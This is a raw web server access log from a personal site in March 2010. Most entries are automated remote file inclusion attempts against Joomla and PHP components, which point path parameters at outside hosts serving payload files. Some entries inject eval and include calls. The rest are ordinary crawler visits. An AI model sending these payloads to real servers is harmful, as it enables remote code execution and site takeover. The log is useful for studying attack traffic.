212.241.177.123 - - [12/Mar/2010:10:00:10 -0800] "GET //accounts/inc/errors.php?error=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:00:10 -0800] "GET /logs///accounts/inc/errors.php?error=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:10:00:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:10:00:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:10:00:14 -0800] "GET /logs/access_090604.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:00:16 -0800] "GET /logs/access_081230.log///accounts/inc/errors.php?error=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:00:27 -0800] "GET /logs/access.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:10:00:28 -0800] "GET /logs/access_090521.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:10:00:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:10:00:36 -0800] "GET /logs/access_080905.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:10:00:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:00:41 -0800] "GET /logs/access_090428.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:43 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:44 -0800] "GET /logs/access_091125.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:44 -0800] "GET /logs/access_091125.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:10:00:45 -0800] "GET /logs/access_090301.log HTTP/1.0" 200 3356849 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:10:00:45 -0800] "GET /logs/access_090107.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:10:00:45 -0800] "GET /logs/access_081103.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:45 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 200 15045 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:45 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 200 15045 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:10:00:46 -0800] "GET /logs//zboard.php?id=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.95 - - [12/Mar/2010:10:00:48 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.107.191.96 - - [12/Mar/2010:10:00:48 -0800] "GET /logs/access_071120.log HTTP/1.1" 200 34560 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:49 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:00:50 -0800] "GET /logs/access_080216.log//squirrelcart/cart_content.php?cart_isp_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:00:50 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:00:50 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:00:50 -0800] "GET /logs/access_090424.log//squirrelcart/cart_content.php?cart_isp_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.20.125.225 - - [12/Mar/2010:10:00:51 -0800] "GET /logs/access_090417.log/pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.20.125.225 - - [12/Mar/2010:10:00:51 -0800] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.20.125.225 - - [12/Mar/2010:10:00:51 -0800] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:10:00:52 -0800] "GET /zboard.php?id=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:10:00:52 -0800] "GET /logs/access_081115.log//zboard.php?id=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.97 - - [12/Mar/2010:10:00:52 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:52 -0800] "GET /logs/access_091125.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:52 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.98 - - [12/Mar/2010:10:00:53 -0800] "GET /blog/index.php/2009/10/ HTTP/1.1" 200 15183 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:00:54 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 200 15045 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.43.97 - - [12/Mar/2010:10:00:56 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.64.43.97 - - [12/Mar/2010:10:00:56 -0800] "GET /logs/access_080717.log%20%20/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.64.43.97 - - [12/Mar/2010:10:00:56 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.99 - - [12/Mar/2010:10:00:59 -0800] "GET /logs/access_080418.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
38.107.191.95 - - [12/Mar/2010:10:01:04 -0800] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/trackback/ HTTP/1.1" 302 17 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
38.107.191.95 - - [12/Mar/2010:10:01:05 -0800] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/ HTTP/1.1" 200 16010 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:01:06 -0800] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.96 - - [12/Mar/2010:10:01:10 -0800] "GET /blog HTTP/1.1" 301 85 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
38.107.191.96 - - [12/Mar/2010:10:01:11 -0800] "GET /blog/ HTTP/1.1" 200 14923 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:01:13 -0800] "GET /logs/access_081010.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:01:13 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:01:13 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.122.95.173 - - [12/Mar/2010:10:01:16 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture013-1024.jpg HTTP/1.1" 200 19751 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322)" "dmulk.com"
38.107.191.97 - - [12/Mar/2010:10:01:18 -0800] "GET /funny/ HTTP/1.1" 200 808 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:01:24 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:01:29 -0800] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:01:38 -0800] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.99 - - [12/Mar/2010:10:01:38 -0800] "GET /logs/access_080109.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:01:39 -0800] "GET /logs/access_100211.log////bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.95 - - [12/Mar/2010:10:01:41 -0800] "GET /bikes/GPS/ HTTP/1.1" 200 954 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.107.191.96 - - [12/Mar/2010:10:01:46 -0800] "GET /logs/access_080707.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.107.191.97 - - [12/Mar/2010:10:01:53 -0800] "GET /megumi/earrings HTTP/1.1" 301 100 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.107.191.97 - - [12/Mar/2010:10:01:53 -0800] "GET /megumi/earrings/ HTTP/1.1" 200 2081 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
69.20.125.225 - - [12/Mar/2010:10:01:56 -0800] "GET /logs/access_090128.log/pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.98 - - [12/Mar/2010:10:01:58 -0800] "GET /logs/access_071218.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:02:02 -0800] "GET /logs/access_090428.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.99 - - [12/Mar/2010:10:02:03 -0800] "GET /blog/index.php/2008/08/ HTTP/1.1" 200 12140 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:02:07 -0800] "GET /logs/access_081010.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:02:07 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.95 - - [12/Mar/2010:10:02:09 -0800] "GET /logs/access_071228.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
194.109.22.115 - - [12/Mar/2010:10:02:09 -0800] "GET /logs/access_090516.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.115.111.242 - - [12/Mar/2010:10:02:10 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:02:11 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.96 - - [12/Mar/2010:10:02:13 -0800] "GET /logs/access_080228.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:02:15 -0800] "GET /logs/access_090502.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:02:17 -0800] "GET /logs/access_090502.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:10:02:17 -0800] "GET /logs/access_090506.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.97 - - [12/Mar/2010:10:02:17 -0800] "GET /tmp/ HTTP/1.1" 200 3084 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:10:02:18 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:10:02:18 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:02:20 -0800] "GET /logs/access.log%20%20////bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:02:21 -0800] "GET /logs////bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:02:21 -0800] "GET ///bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.98 - - [12/Mar/2010:10:02:24 -0800] "GET /blog/index.php/category/uncategorized/ HTTP/1.1" 200 7764 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
38.107.191.99 - - [12/Mar/2010:10:02:29 -0800] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:02:33 -0800] "GET /logs/access_091125.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:02:33 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:02:33 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 200 15076 "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.95 - - [12/Mar/2010:10:02:34 -0800] "GET /blog/index.php/category/ HTTP/1.1" 404 7356 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "dmulk.com"
66.11.114.148 - - [12/Mar/2010:10:02:39 -0800] "GET /zboard.php?id=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:10:02:39 -0800] "GET /logs/access_081115.log//zboard.php?id=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:10:02:39 -0800] "GET /logs//zboard.php?id=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.107.191.96 - - [12/Mar/2010:10:02:40 -0800] "GET /logs/access_080525.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:10:02:40 -0800] "GET /logs/access_100220.log HTTP/1.0" 200 2834833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
38.107.191.97 - - [12/Mar/2010:10:02:44 -0800] "GET /logs/access_071219.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.107.191.98 - - [12/Mar/2010:10:02:48 -0800] "GET /logs/access_080929.log HTTP/1.1" 200 65536 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.107.191.99 - - [12/Mar/2010:10:02:52 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/ HTTP/1.1" 200 8443 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.107.191.95 - - [12/Mar/2010:10:02:56 -0800] "GET /logs/access_080808.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.107.191.96 - - [12/Mar/2010:10:03:00 -0800] "GET /logs/access_080421.log HTTP/1.1" 200 0 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:03:04 -0800] "GET /logs/access_100211.log%20%20////bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:03:13 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:03:13 -0800] "GET /logs/access_080501.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:03:13 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:03:19 -0800] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:03:23 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 142818 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:03:23 -0800] "GET /logs/access_090203.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:03:23 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 15226 "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:03:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:03:27 -0800] "GET /logs/access_090729.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:03:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:03:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:03:29 -0800] "GET /logs/access_090729.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:03:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:03:35 -0800] "GET /logs/access_090614.log%20%20/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:03:36 -0800] "GET /index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 200 14969 "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:03:36 -0800] "GET /logs/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:03:45 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:03:45 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:03:45 -0800] "GET /logs/access_080216.log//squirrelcart/cart_content.php?cart_isp_root=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:03:45 -0800] "GET /logs/access_090424.log//squirrelcart/cart_content.php?cart_isp_root=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:03:45 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:03:46 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:03:46 -0800] "GET /logs/access_090424.log//squirrelcart/cart_content.php?cart_isp_root=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:03:46 -0800] "GET /logs/access_080216.log//squirrelcart/cart_content.php?cart_isp_root=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
